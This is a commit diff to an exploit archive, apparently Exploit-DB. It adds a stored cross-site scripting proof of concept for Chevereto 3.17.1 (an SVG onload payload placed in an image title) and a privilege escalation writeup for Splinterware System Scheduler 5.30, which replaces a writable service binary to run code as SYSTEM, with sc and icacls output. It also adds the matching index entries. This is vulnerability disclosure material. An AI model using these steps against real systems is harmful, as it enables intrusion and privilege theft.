DB: 2021-05-13

2 changes to exploits/shellcodes Splinterware System Scheduler Professional 5.30 - Privilege Escalation Chevereto 3.17.1 - Cross Site Scripting (Stored)
2021-05-13 05:01:53 +00:00 · 2021-05-13 05:01:53 +00:00 · 46c569f0e4
commit 46c569f0e4
parent c3ea8f97de
3 changed files with 64 additions and 0 deletions
--- a/exploits/multiple/webapps/49859.txt
+++ b/exploits/multiple/webapps/49859.txt
@ -0,0 +1,14 @@
+# Exploit Title: Chevereto 3.17.1 - Cross Site Scripting (Stored)
+# Google Dork: "powered by chevereto"
+# Date: 19.04.2021
+# Exploit Author: Akıner Kısa
+# Vendor Homepage: https://chevereto.com/
+# Software Link: https://chevereto.com/releases
+# Version: 3.17.1
+# Tested on: Windows 10 / Xampp
+
+Proof of Concept:
+
+1. Press the Upload image button and upload any image.
+2. After uploading the image, press the pencil icon on the top right of the image and write "><svg/onload=alert(1)> instead of the title.
+3. Upload the picture and go to the picture address.
--- a/exploits/windows/local/49858.txt
+++ b/exploits/windows/local/49858.txt
@ -0,0 +1,48 @@
+# Exploit Title: Splinterware System Scheduler Professional 5.30 - Privilege Escalation
+# Date: 2021-05-11
+# Exploit Author: Andrea Intilangelo
+# Vendor Homepage: https://www.splinterware.com
+# Software Link: https://www.splinterware.com/download/ssproeval.exe
+# Version: 5.30 Professional
+# Tested on: Windows 10 Pro 20H2 x64
+
+System Scheduler Professional 5.30 is subject to privilege escalation due to insecure file permissions, impacting
+where the service 'WindowsScheduler' calls its executable. A non-privileged user could execute arbitrary code with
+elevated privileges (system level privileges as "nt authority\system") since the service runs as Local System;
+renaming the WService.exe file located in the software's path and replacing it with a malicious file, the new one
+will be executed after a short while.
+
+C:\Users\test>sc qc WindowsScheduler
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: WindowsScheduler
+        TIPO                      : 10  WIN32_OWN_PROCESS
+        TIPO_AVVIO                : 2   AUTO_START
+        CONTROLLO_ERRORE          : 0   IGNORE
+        NOME_PERCORSO_BINARIO     : C:\PROGRA~2\SYSTEM~1\WService.exe
+        GRUPPO_ORDINE_CARICAMENTO :
+        TAG                       : 0
+        NOME_VISUALIZZATO         : System Scheduler Service
+        DIPENDENZE                :
+        SERVICE_START_NAME : LocalSystem
+
+C:\Users\test>icacls C:\PROGRA~2\SYSTEM~1\
+C:\PROGRA~2\SYSTEM~1\ BUILTIN\Users:(RX,W)
+                      BUILTIN\Users:(OI)(CI)(IO)(GR,GW,GE)
+                      NT SERVICE\TrustedInstaller:(I)(F)
+                      NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+                      NT AUTHORITY\SYSTEM:(I)(F)
+                      NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+                      BUILTIN\Administrators:(I)(F)
+                      BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+                      BUILTIN\Users:(I)(RX)
+                      BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+                      CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
+                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
+                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
+                      AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
+
+Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
+
+C:\Users\test>
--- a/files_exploits.csv
+++ b/files_exploits.csv
@ -11324,6 +11324,7 @@ id,file,description,date,author,type,platform,port
 49851,exploits/windows/local/49851.txt,"BOOTP Turbo 2.0.0.1253 - 'bootpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49852,exploits/windows/local/49852.txt,"TFTP Broadband 4.3.0.1465 - 'tftpt.exe' Unquoted Service Path",2021-05-10,"Erick Galindo",local,windows,
 49857,exploits/windows/local/49857.txt,"Odoo 12.0.20190101 - 'nssm.exe' Unquoted Service Path",2021-05-11,1F98D,local,windows,
+49858,exploits/windows/local/49858.txt,"Splinterware System Scheduler Professional 5.30 - Privilege Escalation",2021-05-12,"Andrea Intilangelo",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@ -44023,3 +44024,4 @@ id,file,description,date,author,type,platform,port
 49853,exploits/php/webapps/49853.txt,"PHP Timeclock 1.04 - 'Multiple' Cross Site Scripting (XSS)",2021-05-10,"Tyler Butler",webapps,php,
 49854,exploits/php/webapps/49854.txt,"Human Resource Information System  0.1  - 'First Name' Persistent Cross-Site Scripting (Authenticated)",2021-05-10,"Reza Afsahi",webapps,php,
 49856,exploits/php/webapps/49856.py,"Microweber CMS 1.1.20 - Remote Code Execution (Authenticated)",2021-05-10,sl1nki,webapps,php,
+49859,exploits/multiple/webapps/49859.txt,"Chevereto 3.17.1 - Cross Site Scripting (Stored)",2021-05-12,"Akıner Kısa",webapps,multiple,